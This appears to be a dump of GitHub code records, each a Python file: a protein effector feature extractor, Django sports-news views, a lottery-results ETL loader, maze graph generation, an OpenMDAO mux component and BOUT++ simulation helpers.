MOLECULAR_WEIGHT(sequence)\n percent_positively_charged, percent_negatively_charged, charge = CHARGE(sequence)\n exposed = EXPOSED(sequence)\n hydrophobicity = HYDROPHOBICITY(sequence) \n polarity = POLARITY(sequence)\n flexibility = FLEX(sequence)\n aromatic = 100.0*(sequence.count('F') + sequence.count('H') + sequence.count('W') + sequence.count('Y'))/length\n polar = 100.0*(sequence.count('D') + sequence.count('E') + sequence.count('H') + sequence.count('K') + sequence.count('N') + sequence.count('Q') + sequence.count('R') + sequence.count('S') + sequence.count('T') + sequence.count('Z'))/length\n disorder = DISORDER(sequence)\n bulky = BULKY(sequence)\n alpha = ALPHA(sequence)\n beta = BETA(sequence)\n coil = COIL(sequence)\n\n X[protein_position] = amino_acid_frequencies + [molecular_weight, percent_positively_charged, percent_negatively_charged, exposed] \n X[protein_position] += [hydrophobicity, polarity, flexibility] + [aromatic, polar, disorder, bulky] + [alpha, beta, coil]\n\n # Write protein feature data to WEKA arff file\n f.writelines(ARFF_HEADER)\n for index, vector in enumerate(X):\n for feature in vector:\n f.writelines(str(feature) + ',')\n f.writelines('?\\n')\n\n return\n# -----------------------------------------------------------------------------------------------------------\ndef MOLECULAR_WEIGHT(sequence):\n\n molecular_weight = 0.0\n\n for aa in sequence:\n if aa.upper() in MOLECULAR_WEIGHT_DIC:\n molecular_weight += MOLECULAR_WEIGHT_DIC[aa.upper()]\n\n return molecular_weight \n# -----------------------------------------------------------------------------------------------------------\ndef HYDROPHOBICITY(sequence):\n\n hydrophobicity = 0\n\n for aa in sequence:\n if aa.upper() in HYDRO_DIC:\n hydrophobicity += HYDRO_DIC[aa.upper()]\n\n return hydrophobicity/len(sequence) \n# -----------------------------------------------------------------------------------------------------------\ndef FLEX(sequence):\n \n flexibility = 0.0\n for aa in sequence:\n if aa.upper() in FLEX_DIC:\n flexibility += FLEX_DIC[aa.upper()]\n\n return flexibility/len(sequence) \n# -----------------------------------------------------------------------------------------------------------\ndef CHARGE(sequence):\n\n positively_charged, negatively_charged, charge = 0, 0, 0\n\n for aa in sequence:\n if aa.upper() in CHARGE_DIC:\n if CHARGE_DIC[aa.upper()] == 1:\n positively_charged += 1\n charge += 1\n if CHARGE_DIC[aa.upper()] == -1:\n negatively_charged += 1\n charge += -1\n if aa.upper() == 'H':\n charge += 0.5\n\n return 100.0*(positively_charged)/len(sequence), 100.0*(negatively_charged)/len(sequence), charge/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef POLARITY(sequence):\n\n polarity = 0\n\n for aa in sequence:\n if aa.upper() in POLARITY_DIC:\n polarity += POLARITY_DIC[aa.upper()]\n\n return polarity/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef DISORDER(sequence):\n \n disorder = 0.0\n for aa in sequence:\n if aa.upper() in DISORDER_DIC:\n disorder += DISORDER_DIC[aa.upper()]\n\n return disorder/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef EXPOSED(sequence):\n \n exposed = 0.0\n for aa in sequence:\n if aa.upper() in EXPOSED_DIC:\n exposed += EXPOSED_DIC[aa.upper()]\n\n return exposed/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef ALPHA(sequence):\n\n alpha = 0.0\n for aa in sequence:\n if aa.upper() in ALPHA_DIC:\n alpha += ALPHA_DIC[aa.upper()]\n\n return alpha/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef BETA(sequence):\n \n beta = 0.0\n for aa in sequence:\n if aa.upper() in BETA_DIC:\n beta += BETA_DIC[aa.upper()]\n\n return beta/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef COIL(sequence):\n \n coil = 0.0\n for aa in sequence:\n if aa.upper() in COIL_DIC:\n coil += COIL_DIC[aa.upper()]\n\n return coil/len(sequence) \n# -----------------------------------------------------------------------------------------------------------\ndef BULKY(sequence):\n \n bulky = 0.0\n for aa in sequence:\n if aa.upper() in BULKY_DIC:\n bulky += BULKY_DIC[aa.upper()]\n\n return bulky/len(sequence)\n# -----------------------------------------------------------------------------------------------------------\ndef write_FASTA_short_ids(f_output, ORIGINAL_IDENTIFIERS, ORIGINAL_SEQUENCES):\n \"\"\" Function: write_FASTA_short_ids()\n Purpose: Given a list of identifiers and the corresponding list \n of sequence, write these to a FASTA file using short\n identifiers such as protein1, protein2, .... This is \n done because some programs like pepstats do not like \n long identifier names as input.\n \n Input: Path to desired FASTA format output file, list of \n identifiers and list of corresponding sequences.\n \n Return: List of short identifiers.\n \"\"\"\n\n with open(f_output, 'w') as f:\n SHORT_IDENTIFIERS = []\n # Change identifiers to protein1, protein2, ...\n # and write to temporary file\n SET = zip(ORIGINAL_IDENTIFIERS, ORIGINAL_SEQUENCES)\n \n for index, (identifier, sequence) in enumerate(SET):\n short_id = '>protein' + str(index)\n SHORT_IDENTIFIERS.append(short_id)\n f.writelines(short_id + '\\n')\n f.writelines(sequence + '\\n')\n\n return SHORT_IDENTIFIERS\n# -----------------------------------------------------------------------------------------------------------\ndef parse_weka_output(file_input, ORIGINAL_IDENTIFIERS, SEQUENCES):\n \"\"\" Function: parse_weka_output()\n Purpose: Given the WEKA output file and the query identifiers and sequences, \n parse the predicted class for each protein from the WEKA output. \n Write the predicted effectors to a FASTA file.\n \n Input: WEKA output file and the query identifiers and sequences. \n \n Return: The set of predicted effectors only as well as all predictions. \n \"\"\" \n predicted_effectors, predicted_noneffectors, predictions = [], [], []\n\n with open(file_input) as f:\n\n content = f.readlines()\n\n content_start = content.index(' inst# actual predicted error prediction (A,C,D,E,F,G,H,I,K,L,M,N,P,Q,R,S,T,V,W,Y,MolecularWeight,PosCharge,NegCharge,Exposed,Hydrophobicity,polarity,flexibility,aromatic,polar,disorder,Bulky,Alpha,Beta,Coil)\\n')\n\n content = content[content_start + 1:]\n\n for line in content:\n if line.strip():\n position = line.split()[0]\n prediction = line.split()[2]\n prob = float(line.split()[3]) \n \n # WEKA output counts from position 1, our identifiers are counted from zero\n identifier = ORIGINAL_IDENTIFIERS[int(position) - 1]\n sequence = SEQUENCES[int(position) - 1]\n\n if 'non-eff' in prediction: \n noneffector = identifier.strip()\n noneffector = noneffector.replace('>', '') \n predictions.append((noneffector, 'Non-effector', prob, sequence))\n predicted_noneffectors.append((noneffector, prob, sequence))\n else: \n effector = identifier.strip()\n effector = effector.replace('>', '') \n predictions.append((effector, 'Effector', prob, sequence))\n # Append predicted effector to list of predicted effectors\n predicted_effectors.append((effector, prob, sequence))\n\n return predicted_effectors, predicted_noneffectors, predictions\n# -----------------------------------------------------------------------------------------------------------\ndef short_output_screen(predictions, cyto_effectors, apo_effectors, cyto_apo_effectors, apo_cyto_effectors):\n \"\"\" Function: short_output_screen()\n Purpose: Given the WEKA predictions for each protein, write \n string that contains the short output format.\n \n Input: WEKA predictions for each protein. \n \n Return: String that contains predictions for all proteins as tab-delimited table.\n \"\"\"\n # Output predictions for all proteins as tab-delimited table\n\n col_width = max(len(protein) for protein, pred, prob, sequence in predictions) + 1 # padding\n col_width = max(col_width, 10)\n pred_col_width = 20\n\n short_output_string = \"\".join(\"# Identifier\".ljust(col_width)) + '\\t' \n short_output_string += \"\".join(\"Cytoplasmic effector\".ljust(pred_col_width)) + '\\t' \n short_output_string += \"\".join(\"Apoplastic effector\".ljust(pred_col_width)) + '\\t' \n short_output_string += \"\".join(\"Non-effector\".ljust(pred_col_width)) + '\\t' \n short_output_string += \"\".join(\"Prediction\".ljust(pred_col_width)) + '\\n' \n\n for index, (protein, pred, prob, sequence) in enumerate(predictions): \n\n short_ident = 'protein' + str(index)\n if short_ident in cyto_effectors:\n short_output_string += \"\".join(protein.ljust(col_width)) + '\\t' + 'Y' + ' (' + str(prob) + ') ' + '\\t' + \"\".join('-'.ljust(pred_col_width)) + '\\t'\n short_output_string += \"\".join('-'.ljust(pred_col_width)) + '\\t' + 'Cytoplasmic effector' + '\\n' \n elif short_ident in apo_effectors:\n short_output_string += \"\".join(protein.ljust(col_width)) + '\\t' + \"\".join('-'.ljust(pred_col_width)) + '\\t' + 'Y' + ' (' + str(prob) + ') ' + '\\t' \n short_output_string += \"\".join('-'.ljust(pred_col_width)) + '\\t' + 'Apoplastic effector' + '\\n' \n elif short_ident in cyto_apo_effectors:\n short_output_string += \"\".join(protein.ljust(col_width)) + '\\t' + 'Y' + ' (' + str(cyto_apo_effectors[short_ident][0])+ ') ' + '\\t' \n short_output_string += 'Y' + ' (' + str(cyto_apo_effectors[short_ident][1]) + ') ' + '\\t' + \"\".join('-'.ljust(pred_col_width)) + '\\t' + 'Cytoplasmic/apoplastic effector' + '\\n' \n elif short_ident in apo_cyto_effectors:\n short_output_string += \"\".join(protein.ljust(col_width)) + '\\t' + 'Y' + ' (' + str(apo_cyto_effectors[short_ident][1])+ ') ' + '\\t' \n short_output_string += 'Y' + ' (' + str(apo_cyto_effectors[short_ident][0]) + ') ' + '\\t' + \"\".join('-'.ljust(pred_col_width)) + '\\t' + 'Apoplastic/cytoplasmic effector' + '\\n' \n else:\n short_output_string += \"\".join(protein.ljust(col_width)) + '\\t' + \"\".join('-'.ljust(pred_col_width)) + '\\t' + \"\".join('-'.ljust(pred_col_width)) + '\\t' \n short_output_string += 'Y' + ' (' + str(prob) + ') ' + '\\t' + 'Non-effector' + '\\n' \n\n\n return short_output_string\n# -----------------------------------------------------------------------------------------------------------\ndef short_output_file(predictions, cyto_effectors, apo_effectors, cyto_apo_effectors, apo_cyto_effectors):\n \"\"\" Function: short_output_file()\n Purpose: Given the WEKA predictions for each protein, write \n string that contains the short output format.\n \n Input: WEKA predictions for each protein. \n \n Return: String that contains predictions for all proteins as tab-delimited table.\n \"\"\"\n # Output predictions for all proteins as tab-delimited table\n\n\n short_output_string = \"# Identifier\" + '\\t' + \"Cytoplasmic effector\" + '\\t' \n short_output_string += \"Apoplastic effector\" + '\\t' \n short_output_string += \"Non-effector\" + '\\t' \n short_output_string += \"Prediction\" + '\\n' \n\n for index, (protein, pred, prob, sequence) in enumerate(predictions): \n\n short_ident = 'protein' + str(index)\n \n if short_ident in cyto_effectors:\n short_output_string += protein + '\\t' + 'Y' + ' (' + str(prob) + ')' + '\\t' + '-' + '\\t'\n short_output_string += '-' + '\\t' + 'Cytoplasmic effector' + '\\n' \n elif short_ident in apo_effectors:\n short_output_string += protein + '\\t' + '-' + '\\t' + 'Y' + ' (' + str(prob) + ')' + '\\t' \n short_output_string += '-' + '\\t' + 'Apoplastic effector' + '\\n' \n elif short_ident in cyto_apo_effectors:\n short_output_string += protein + '\\t' + 'Y' + ' (' + str(cyto_apo_effectors[short_ident][0]) + ')' + '\\t' \n short_output_string += 'Y' + ' (' + str(cyto_apo_effectors[short_ident][1]) + ')' + '\\t' + '-' + '\\t' + 'Cytoplasmic/apoplastic effector' + '\\n' \n elif short_ident in apo_cyto_effectors:\n short_output_string += protein + '\\t' + 'Y' + ' (' + str(apo_cyto_effectors[short_ident][1]) + ')' + '\\t' \n short_output_string += 'Y' + ' (' + str(apo_cyto_effectors[short_ident][0]) + ')' + '\\t' + '-' + '\\t' + 'Apoplastic/cytoplasmic effector' + '\\n' \n else:\n short_output_string += protein + '\\t' + '-' + '\\t' + '-' + '\\t' \n short_output_string += 'Y' + ' (' + str(prob) + ')' + '\\t' + 'Non-effector' + '\\n' \n\n\n return short_output_string \n# -----------------------------------------------------------------------------------------------------------\ndef long_output(ORIGINAL_IDENTIFIERS, predicted_effectors):\n \"\"\" Function: long_output()\n Purpose: Given the predicted effectors and identifiers for the test set, \n write string that contains the long output format.\n \n Input: Predicted effectors and identifiers of test set. \n \n Return: String that contains list of predicted effectors with posterior probabilites\n and a short statistic on the percentage of predicted effectors in the test set.\n \"\"\"\n # Output predicted effectors for long format\n long_output_string = '-----------------\\n'\n long_output_string += 'Predicted effectors:\\n\\n'\n for effector, prob, sequence in predicted_effectors:\n long_output_string += effector + '| Effector probability:' + str(prob) + '\\n'\n\n long_output_string += '-----------------\\n\\n'\n long_output_string += 'Number of proteins that were tested: ' + str(len(ORIGINAL_IDENTIFIERS)) + '\\n' \n long_output_string += 'Number of predicted effectors: ' + str(len(predicted_effectors)) + '\\n' \n long_output_string += '\\n' + '-----------------' + '\\n' \n long_output_string += str(round(100.0*len(predicted_effectors)/len(ORIGINAL_IDENTIFIERS), 1)) + ' percent are predicted to be effectors.' \n long_output_string += '\\n' + '-----------------' + '\\n'\n\n return long_output_string\n# -----------------------------------------------------------------------------------------------------------","repo_name":"JanaSperschneider/EffectorP-3.0","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":43287,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"8655285829","text":"from game.models import Game, Campionat, News, Team, Player\nfrom django.db.models import Q\nfrom django.shortcuts import render\nfrom django.core.paginator import Paginator\nfrom django.template.loader import get_template\nfrom django.http import HttpResponse\nfrom django.template import Context\nimport datetime\nfrom django.shortcuts import get_object_or_404\nfrom django.http import Http404\nfrom django.core.urlresolvers import reverse\n\n\ndef create_breadcrumbs(crumbs):\n \"\"\"\n This is a function for creating breadcrumbs.\n\n :param crumbs: a list of locations and names. Something like [('/team/1/', 'Barcelona'), ('/team/1/2/', 'Ronaldinho')]\n :returns: an html formated breadcrumbs\n :rtype: str\n \"\"\"\n ret = '/ → '\n number_of_elements = len(crumbs) - 1\n for i, element in enumerate(crumbs):\n (url, name) = element\n if i < number_of_elements:\n ret += '%s ' % (url, name)\n ret += '→ '\n else:\n ret += name\n return ret\n\n\ndef hero_of_the_day(day=datetime.date.today(), campionat=None):\n \"\"\"\n This function calculate the hero of the day. For each game we can calculate the hero by using the method game.hero().\n By default we think that we are interested in today.\n\n :param day: a day for calculating hero\n :type day: datetime.date\n :param campionat: the campionat for calculating hero. If is None, then we calculate for all leagues.\n :type campionat: writer.game.models.Campionat\n :returns: a dict with player, the number of points and datas about why we think it's an hero.\n :rtype: dict\n \"\"\"\n args = Q(pub_date=day)\n if campionat:\n args &= Q(campionat=campionat)\n game_list = Game.objects.filter(args).all()\n hero = {'player': None, 'points': 0, 'data': None}\n ret = False\n for game in game_list:\n h = game.hero()\n if h and (h['points'] > hero['points']):\n hero = h\n ret = True\n if ret:\n return hero\n return None\n\n\ndef base(request, campionat=None):\n crumbs = ''\n news_args = Q(pub_date__lte=datetime.datetime.now())\n games_args = Q(ft=True)\n campionat_item = None\n if campionat:\n campionat_item = get_object_or_404(Campionat, slug=campionat)\n news_args &= Q(game__campionat=campionat_item)\n games_args &= Q(campionat=campionat_item)\n try:\n clasament_list = [campionat_item.clasament()]\n except:\n clasament_list = []\n live = request.GET.get('live', False)\n if live:\n news_args &= Q(game__live__isnull=False)\n last_game = Game.objects.filter(games_args).order_by('-pub_date').first()\n games_args &= Q(pub_date=last_game.pub_date)\n game_list = Game.objects.filter(games_args).order_by('-id')\n image_list = []\n for game in game_list:\n for image in game.images.all():\n image_list.append(image)\n news_list = News.objects.filter(news_args).order_by('-pub_date')\n paginator = Paginator(news_list, 10)\n\n page = request.GET.get('page', 1)\n newses = paginator.page(page)\n campionat_list = Campionat.objects.all()\n if not campionat:\n clasament_list = []\n for campionat in campionat_list:\n try:\n clasament_list.append(campionat.clasament())\n except:\n pass\n hero = hero_of_the_day(day=last_game.pub_date, campionat=campionat_item)\n if campionat_item:\n crumbs = create_breadcrumbs([\n (None, campionat_item.title)\n ])\n return render(request, 'index.html',\n {'news_list': newses, 'campionat_list': campionat_list,\n 'game_list': game_list, 'image_list': image_list,\n 'clasament_list': clasament_list, 'hero': hero,\n 'campionat_item': campionat_item, 'crumbs': crumbs})\n\n\ndef news(request, campionat=None, title=None):\n news_item = News.objects.filter(\n game__campionat__slug=campionat,\n slug=title\n ).first()\n if not news_item:\n raise Http404\n campionat_list = Campionat.objects.all()\n clasament_list = []\n try:\n clasament_list = [news_item.game.render_clasament()]\n if news_item.game != news_item.game.campionat.game_set.first():\n clasament_list.append(news_item.game.campionat.clasament())\n except:\n pass\n hero = news_item.game.hero()\n crumbs = create_breadcrumbs([\n (reverse('campionat',\n kwargs={'campionat': news_item.game.campionat.slug}\n ), news_item.game.campionat.title),\n (None, news_item.title)\n ])\n other_news_list = News.objects.filter(\n Q(game__campionat=news_item.game.campionat) &\n Q(game__pub_date=news_item.game.pub_date) &\n Q(pub_date__lt=news_item.pub_date)\n ).order_by('-id')\n return render(request, 'news.html',\n {'news_item': news_item, 'campionat_list': campionat_list,\n 'clasament_list': clasament_list, 'hero': hero,\n 'crumbs': crumbs, 'other_news_list': other_news_list})\n\n\ndef teams(request, campionat=None):\n campionat = get_object_or_404(Campionat, slug=campionat)\n team_list = campionat.team_set.all()\n clasament_list = []\n try:\n clasament_list = [campionat.clasament()]\n except:\n pass\n campionat_list = Campionat.objects.all()\n return render(request, 'teams.html', {'team_list': team_list,\n 'clasament_list': clasament_list,\n 'campionat_list': campionat_list})\n\n\ndef team(request, campionat=None, team=None):\n team = Team.objects.filter(\n Q(slug=team) & Q(campionat__slug=campionat)\n ).first()\n if not team:\n raise Http404\n clasament_list = [team.campionat.clasament()]\n player_list = list(set(list(Player.objects.filter(\n Q(goal__team=team) & Q(goal__auto=False)).all())))\n game_list = Game.objects.filter(\n Q(ft=True) &\n (Q(team1=team) | Q(team2=team))\n ).order_by('-pub_date')\n crumbs = create_breadcrumbs([\n (reverse('campionat',\n kwargs={'campionat': team.campionat.slug}\n ), team.campionat.title\n ),\n (None, team.title)\n ])\n return render(request, 'team.html', {'team': team,\n 'clasament_list': clasament_list,\n 'player_list': player_list,\n 'game_list': game_list,\n 'crumbs': crumbs})\n\n\ndef rss(request, campionat=None, team=None):\n args = Q(pub_date__lte=datetime.datetime.now())\n if campionat:\n args &= Q(game__campionat__slug=campionat)\n if team:\n args &= (Q(game__team1__slug=team) | Q(game__team2__slug=team))\n article_list = News.objects.filter(args).order_by('-pub_date')[0:50]\n template = get_template('rss.xml')\n return HttpResponse(template.render(Context(locals())),\n content_type=\"application/rss+xml\")\n","repo_name":"gnunixon/sport-news-writer","sub_path":"writer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25931915650","text":"import csv\nimport os\nfrom io import StringIO\n\nimport boto3\nimport requests\nfrom boto3.dynamodb.conditions import Key\n\nURL_TEMPLATE = 'https://www.txlottery.org/export/sites/lottery/Games/{}/Winning_Numbers/{}.csv'\nLOTTERY_RESULTS_TABLE = os.environ['TABLE_NAME']\n\n\nclass Games:\n LOTTO_TEXAS = 'Lotto Texas'\n MEGAMILLIONS = 'Mega Millions'\n POWERBALL = 'Powerball'\n\n\ndef run_etl(game_id: str) -> dict:\n source_data = extract_winning_numbers(game_id)\n loaded = load_winning_numbers(source_data)\n return {\n game_id: {\n 'extracted': len(source_data),\n 'loaded': loaded\n }\n }\n\n\ndef extract_winning_numbers(game_id: str) -> list:\n url = URL_TEMPLATE.format(\n game_id.replace(' ', '_'),\n game_id.replace(' ', '').lower()\n )\n resp = requests.get(url)\n reader = csv.DictReader(StringIO(resp.text),\n fieldnames=['GameName', 'Month', 'Day', 'Year'],\n restkey='Numbers')\n winning_numbers = []\n for row in reader:\n winning_numbers.append({\n 'DrawingDate': '{}-{:02d}-{:02d}'.format(int(row['Year']), int(row['Month']), int(row['Day'])),\n 'GameId': row['GameName'].replace(' ', '').lower(),\n 'WinningNumbers': [int(n) for n in row['Numbers']]\n })\n\n return winning_numbers\n\n\ndef load_winning_numbers(winning_numbers: list):\n game_id = str(winning_numbers[0]['GameId'])\n table = boto3.resource('dynamodb').Table(LOTTERY_RESULTS_TABLE)\n\n # Get latest loaded record from target table.\n resp = table.query(\n KeyConditionExpression=Key('GameId').eq(game_id),\n ScanIndexForward=False,\n Limit=1)\n results_to_load = []\n if len(resp['Items']) == 0:\n # No data has been loaded, so load everything.\n results_to_load = winning_numbers\n else:\n latest_loaded_date = resp['Items'][0]['DrawingDate']\n for result in reversed(winning_numbers):\n result_date = result['DrawingDate']\n if result_date <= latest_loaded_date:\n break\n results_to_load.append(result)\n\n # Load only records after latest loaded date.\n with table.batch_writer() as batch:\n for result in results_to_load:\n batch.put_item(Item=result)\n\n return len(results_to_load)\n","repo_name":"puremcc/lottochecker","sub_path":"backend/functions/etl/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29577984694","text":"def genNode(grid, size, nodes, pop_no):\n for i in range(size):\n for j in range(size):\n if ((grid[j][i].walls[1] == False and grid[j][i].walls[0] == False) and\n (grid[j][i].walls[2] == True and grid[j][i].walls[3] == True)) or \\\n ((grid[j][i].walls[1] == True and grid[j][i].walls[0] == True) and\n (grid[j][i].walls[2] == False and grid[j][i].walls[3] == False)):\n grid[j][i].isNode = False\n else:\n nodes.append(grid[j][i])\n grid[j][i].beenVisited = [(False, None) for x in range(pop_no)]\n grid[j][i].check_out = [{\"up\": False, \"down\": False, \"left\": False, \"right\": False} for x in range(pop_no)]\n\n\n\ndef genNeighbor(grid, size):\n # up 0, down 1, right 2, left 3\n for i in range(size):\n for j in range(size):\n if grid[j][i].isNode:\n if grid[j][i].walls[0] == False:\n k = j - 1\n while not grid[k][i].isNode:\n k -= 1\n grid[j][i].neighbors[\"up\"] = grid[k][i]\n\n if grid[j][i].walls[1] == False:\n k = j + 1\n while not grid[k][i].isNode:\n k += 1\n grid[j][i].neighbors[\"down\"] = grid[k][i]\n\n # if right is false, find nearest neighbor\n if grid[j][i].walls[2] == False:\n k = i + 1\n while not grid[j][k].isNode:\n k += 1\n grid[j][i].neighbors[\"right\"] = grid[j][k]\n\n if grid[j][i].walls[3] == False:\n k = i - 1\n while not grid[j][k].isNode:\n k -= 1\n grid[j][i].neighbors[\"left\"] = grid[j][k]\n\n\ndef print_Neighbors(grid, direction):\n for row in grid:\n for e in row:\n if direction == 0:\n if e.neighbors[\"up\"] != None:\n print(\"Node at: (\", e.x, e.y, \")\", \"Top neighbor is:\", end=\" \")\n e.neighbors[\"up\"].print_node()\n if direction == 1:\n if e.neighbors[\"down\"] != None:\n print(\"Node at: (\", e.x, e.y, \")\", \"Bottom neighbor is:\", end=\" \")\n e.neighbors[\"down\"].print_node()\n if direction == 2:\n if e.neighbors[\"right\"] != None:\n print(\"Node at: (\", e.x, e.y, \")\", \"Right neighbor is:\", end =\" \")\n e.neighbors[\"right\"].print_node()\n if direction == 3:\n if e.neighbors[\"left\"] != None:\n print(\"Node at: (\", e.x, e.y, \")\", \"Left neighbor is:\", end=\" \")\n e.neighbors[\"left\"].print_node()\n\n\n","repo_name":"Levoo/CPSC481-AI_Proj","sub_path":"NodeGen.py","file_name":"NodeGen.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37339374528","text":"import pdb\nimport numpy as np\nimport openmdao\nimport openmdao.api as om\n\n\nclass Mux(om.ExplicitComponent):\n \"\"\"\n Mux trajectory phases.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Instantiate Mux and populate private members.\n \"\"\"\n super().__init__(**kwargs)\n\n self._vars = {}\n self._input_names = {}\n\n def initialize(self):\n \"\"\"\n Declare options.\n \"\"\"\n\n # self.options.declare('gauss_transcription_order', default=3, desc='transcription_order')\n self.options.declare('input_size_array', default=np.array([20, 20]), desc='Size of input arrays to be muxed')\n self.options.declare('output_size', default=2, desc='Size of the muxed array')\n self.options.declare('objective', types=str)\n self.options.declare('case_name', types=str)\n self.options.declare('output_directory_name', types=str)\n\n def add_var(self, name:str, val=1.0, units=None, desc=''):\n \"\"\"\n Add variable to the mux component.\n\n :param name: variable name\n :type name: str\n :param val: variable value\n :type val: np.ndarray\n :param units: variable units\n :type units: str\n :param desc: variable description\n :type desc: str\n\n :return: None\n \"\"\"\n\n # Load options\n input_size_array = self.options['input_size_array']\n output_size = self.options['output_size']\n mux_num = len(input_size_array)\n\n self._vars[name] = {'val': val, 'units': units, 'desc': desc}\n options = self._vars[name]\n kwgs = self._vars[name]\n\n # Add inputs for the number of arrays to be muxed for the variable name\n self._input_names[name] = []\n \n n_output = 0\n for i in range(mux_num):\n # Add input names to options dict\n in_name = '{0}_{1}'.format(name, i)\n self._input_names[name].append(in_name)\n \n # Add inputs to component\n self.add_input(name=in_name, shape=(input_size_array[i],), **kwgs)\n\n # Add partials\n if i < mux_num-1:\n ro = np.arange(n_output, n_output + input_size_array[i]-1)\n else:\n ro = np.arange(n_output, n_output + input_size_array[i])\n\n # Delete duplicates\n # cols = np.arange(shapes[i])\n if i < mux_num-1:\n co = np.arange(input_size_array[i]-1)\n else:\n co = np.arange(input_size_array[i])\n\n # Declare partials\n self.declare_partials(of=name, wrt=in_name, rows=ro, cols=co)\n\n # Add to output size\n if i < mux_num - 1:\n n_output = n_output + (input_size_array[i] - 1)\n else:\n n_output = n_output + input_size_array[i]\n\n # Add output variable\n self.add_output(name=name,\n val=np.zeros(int(output_size),),\n units=options['units'],\n desc=options['desc'])\n\n def compute(self, inputs: openmdao.vectors.default_vector.DefaultVector, outputs: openmdao.vectors.default_vector.DefaultVector):\n\n # Load options\n input_size_array = self.options['input_size_array']\n mux_num = len(input_size_array)\n\n # Iterate over the variables in the mux component\n for var in self._vars:\n\n # Select input variable name \n invar = self._input_names[var]\n\n # Append inputs of same variable name to vals\n output_vals=[]\n for i in range(mux_num): \n # Extract input array\n input_array = inputs[invar[i]]\n\n if i < mux_num-1:\n output_vals.append(input_array[np.arange(input_size_array[i]-1)])\n else:\n output_vals.append(input_array[np.arange(input_size_array[i])])\n\n # Write stack of vals to outputs\n outputs[var] = np.hstack(output_vals)\n\n if var in ['TS', 'theta_flaps', 'alpha']:\n if self.options['objective'] == 'noise':\n # Write TS to file\n f = open('/Users/laurensvoet/Documents/Research/pyNA/pyNA/cases/' + self.options['case_name'] + '/output/' + self.options['output_directory_name'] + '/' + 'inputs_' + var + '.txt' , 'a')\n f.write(str(outputs[var]) + '\\n')\n f.close()\n\n def compute_partials(self, inputs:openmdao.vectors.default_vector.DefaultVector, partials: openmdao.vectors.default_vector.DefaultVector):\n\n # Load options\n input_size_array = self.options['input_size_array']\n mux_num = len(input_size_array)\n\n for var in self._vars:\n invar = self._input_names[var]\n\n for i, iv in enumerate(invar):\n\n if i < mux_num-1:\n partials[var, iv]= np.ones(input_size_array[i]-1)\n else:\n partials[var, iv]= np.ones(input_size_array[i])\n\n \n\n\n","repo_name":"MIT-LAE/pyNA","sub_path":"pyNA/src/trajectory_src/mux.py","file_name":"mux.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"15931491038","text":"import numpy as np\nimport os\nimport sys\nimport datetime\nimport time\nfrom boutdata.restart import addvar\nfrom boutdata.restart import create\nfrom boutdata.restart import addnoise\nfrom boutdata.restart import resizeZ\nfrom boutdata.restart import redistribute\nfrom inspect import getsource as GS\n\n\ndef func_reqs(obj):\n lines = GS(obj).partition(':')[0]\n print(lines)\n\n\ndef list_files(path):\n files = [f for f in os.listdir(path) if os.path.isfile(f)]\n for f in files:\n print(f)\n\n\ndef replace_line(file_name, line_num, text):\n # replaces lines in a file\n lines = open(file_name, 'r').readlines()\n lines[line_num - 1] = text + '\\n'\n out = open(file_name, 'w')\n out.writelines(lines)\n out.close()\n\n\ndef find_line(filename, lookup):\n # finds line in a file\n line_num = 'blah'\n with open(filename) as myFile:\n for num, line in enumerate(myFile, 1):\n if lookup in line:\n line_num = num\n if line_num == 'blah':\n sys.exit('could not find \"{}\" in \"{}\"'.format(lookup, filename))\n return line_num\n\n\ndef read_line(filename, lookup):\n lines = open(filename, 'r').readlines()\n line_num = find_line(filename, lookup) - 1\n tmp = lines[line_num].split(': ')[1]\n try:\n tmp = eval(tmp)\n except(NameError, SyntaxError):\n tmp = tmp.strip()\n return tmp\n\n\ndef list_grids(densities, shotnum, machine='tcv', resolution='64x64'):\n d_names = []\n for d in densities:\n d_names.append(f'{machine}_{shotnum}_{resolution}_profiles_{d}e19.nc')\n return d_names\n\n\nclass logSim:\n '''\n For logging simulation parameters\n '''\n def __init__(self, location, filename):\n self.fileName = '{}/{}'.format(location, filename)\n self.logFile = open(self.fileName, 'w+')\n self.logFile.close()\n\n def __call__(self, message):\n self.logFile = open(self.fileName, 'a+')\n self.logFile.write('{}\\r\\n'.format(message))\n self.logFile.close()\n\n\nclass startSim:\n '''\n Create a simulation object, defined with path to pertinent files and\n where they should be copied to. Also defines methods for modifying\n BOUT.inp file and job submission scripts\n '''\n def __init__(self, pathOut, pathIn, dateDir, inpFile='BOUT.inp',\n gridFile=None, scanParams=None, title='sim'):\n os.chdir(pathOut)\n self.pathOut = pathOut\n self.pathIn = pathIn\n self.inpFile = inpFile\n self.gridFile = gridFile\n self.runDir = '{}/{}/{}-{}'.format(pathOut, pathIn, title, dateDir)\n self.scanParams = scanParams\n self.title = title\n if self.scanParams is not None:\n self.scanNum = len(scanParams)\n else:\n self.scanNum = 1\n if os.path.isdir('{}/{}'.format(pathOut, pathIn)) is not True:\n os.chdir(pathOut)\n os.mkdir(pathIn)\n\n def modInp1(self, param, lineNum=None):\n if lineNum is None:\n lineNum = find_line('{}/0/{}'.format(\n self.runDir, self.inpFile),\n param)\n else:\n lineNum = lineNum\n for i, j in enumerate(self.scanParams):\n os.chdir('{}/{}'.format(self.runDir, i))\n replace_line('{}'.format(self.inpFile),\n lineNum,\n '{} = {}'.format(param, j))\n\n def modInp2(self, param, value, lineNum=None):\n self.log('Modified {} to: {}'.format(param, value))\n if lineNum is None:\n lineNum = 